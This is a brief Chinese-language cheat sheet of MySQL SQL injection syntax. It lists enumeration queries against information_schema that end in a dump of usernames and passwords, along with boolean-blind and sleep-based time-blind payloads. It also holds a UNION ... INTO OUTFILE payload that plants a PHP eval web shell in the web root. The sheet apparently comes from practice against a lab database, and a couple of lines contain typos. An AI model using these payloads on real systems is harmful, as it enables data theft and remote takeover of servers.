SQL注入常用语法
letf(a,b)函数,left(database(),1)='s'
regexp函数,select user() regexp 'r'
like函数,select user() like 'ro%'
substr(a,b,c),select substr()
ascii()
chr('数字'),ord('字母')
show variables like "%secure%";
load_file()
into outfile
if(condition,A,B)
length()
group_concat()
concat_ws(0x7e,a,b)
concat()
select schema_name from information_schema.schemata;
select table_name from information_schema.tables where table_schema='security';
select column_name from information_schema.columns where table_name='users';
select username,password from security.users;
and left((select database()),1)='s'
and ascii(substr((select database()),1,1))=115;
and ascii(substr((select schema_name from information_schema.schemat limit 1,1),1,1))>10
union select 1,2,'<?php @eval($_POST[\'crow\']); ?>' into outfile '/var/www/html/tmp/1.php'
select if()
- select database()
- substr((select database()),1,1)
- ascii(substr((select database()),1,1))
- select if(ascii(substr((select database()),1,1)) > 10,2,3)
select length(database());
and if(length(database())=8,1,sleep(5))
and if(ascii(substr((select database()),1,1)) > 10,2,sleep(5))